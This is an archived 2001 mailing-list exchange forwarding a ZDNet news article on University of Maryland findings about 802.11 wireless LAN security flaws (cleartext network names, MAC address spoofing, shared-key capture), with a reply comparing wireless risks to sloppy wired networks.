RE: ZDNet - Security flaws in the 802.11 wireless LAN protocol.

From: Steve Dossick (
Date: Tue Apr 03 2001 - 20:49:08 PDT

Wireless lans are no better than a sloppy wired networking job. I have
worked in places where the corporate firewall was in a shared datacenter in
the basement of the building; any one of the tenants of the building could
have gone in and tapped into anothers' network. Large organizations with
open DHCP servers (giving out addresses to all comers) are also not
particularly secure, but that doesnt stop people from setting them up.

Any data which needs security should be transported over a more secure
medium or encrypted first.


-----Original Message-----
From: Mike Dierken
Sent: 4/3/01 8:30 PM
Subject: ZDNet - Security flaws in the 802.11 wireless LAN protocol.

For those interested in wireless LANs, security, etc.


April 3, 2001 2:15 PM PT
A University of Maryland research team said Tuesday that it had
identified several more security flaws in the much-maligned 802.11
wireless LAN protocol.

Earlier this year, researchers at the University of California at
Berkeley discovered several vulnerabilities in the encryption protocol
used on wireless LANs.

"When you combine this with the stuff that the Berkeley guys found, it
pretty much covers all of the security in these wireless access points,"
said William Arbaugh, assistant professor of computer science at the
University of Maryland in College Park.

The latest problems have to do with the way the protocol handles access
control and authorization requests. Arbaugh said finding the problems
was "exceedingly easy" and that exploiting them was trivial.

Potentially the most serious of the three flaws is a hole that allows an
eavesdropper to sniff the name of the network -- which is used as a
shared secret for authentication purposes in some 802.11
implementations, including the Lucent Technologies Inc. Orinoco cards
that Arbaugh's team used -- and then use the information to access the

This would be prevented by the WEP (Wireless Equivalent Privacy)
encryption used in 802.11, but the messages containing the network name
are always broadcast in cleartext, Arbaugh said.

The team also identified a problem with the MAC (media access control)
addresses used on wireless LAN cards. Like the network name, MAC
addresses are broadcast in cleartext and can therefore be easily
captured by an eavesdropper. The attacker can then program the address
onto his or her card and access the network.

The final attack involves capturing via eavesdropping the plaintext and
ciphertext of the shared keys used for authentication. Using this
information, an attacker can compute the valid authentication response
and then compute a new integrity check value using another known exploit
and join the network.


This archive was generated by hypermail 2b29 : Sun Apr 29 2001 - 20:25:29 PDT